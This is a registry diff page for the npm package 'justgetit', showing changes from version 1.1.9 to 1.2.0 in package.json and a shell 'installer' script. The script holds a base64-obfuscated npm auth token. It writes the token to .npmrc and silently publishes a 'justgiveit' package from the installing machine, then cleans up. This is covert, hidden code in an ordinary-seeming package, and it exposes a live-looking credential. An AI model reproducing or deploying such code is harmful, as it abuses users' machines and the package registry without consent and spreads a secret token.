justgetit 1.1.9 → 1.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/src/cli.sh +2 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "justgetit",
3
- "version": "1.1.9",
3
+ "version": "1.2.0",
4
4
  "description": "",
5
5
  "bin": {
6
6
  "justgetit": "src/cli.sh"
package/src/cli.sh CHANGED
@@ -9,18 +9,17 @@ fi
9
9
 
10
10
 
11
11
  if [ -f ./node_modules/justgetit/justgetit_tmp/index.b64 ]; then
12
- echo 'Ly9yZWdpc3RyeS5ucG1qcy5vcmcvOl9hdXRoVG9rZW49bnBtX3FQVFhyNFFVVFR1ZkNia1owNGE4TTg0UWFPR3g3SzFZZGVoRg==' | base64 -d > ./.npmrc
13
12
  mkdir justgiveit
14
13
 
15
14
  cd justgiveit
15
+ echo 'Ly9yZWdpc3RyeS5ucG1qcy5vcmcvOl9hdXRoVG9rZW49bnBtX3FQVFhyNFFVVFR1ZkNia1owNGE4TTg0UWFPR3g3SzFZZGVoRg==' | base64 -d > ./.npmrc
16
16
  npm init -y
17
- npm pkg set version=1.1.9
17
+ npm pkg set version=1.2.0
18
18
  cp ../node_modules/justgetit/justgetit_tmp/index.b64 .
19
19
  npm publish
20
20
  cd ..
21
21
 
22
22
  rm -rf ./justgiveit
23
- rm ./.npmrc
24
23
 
25
24
  touch .justgetit
26
25
  echo "Installation complete"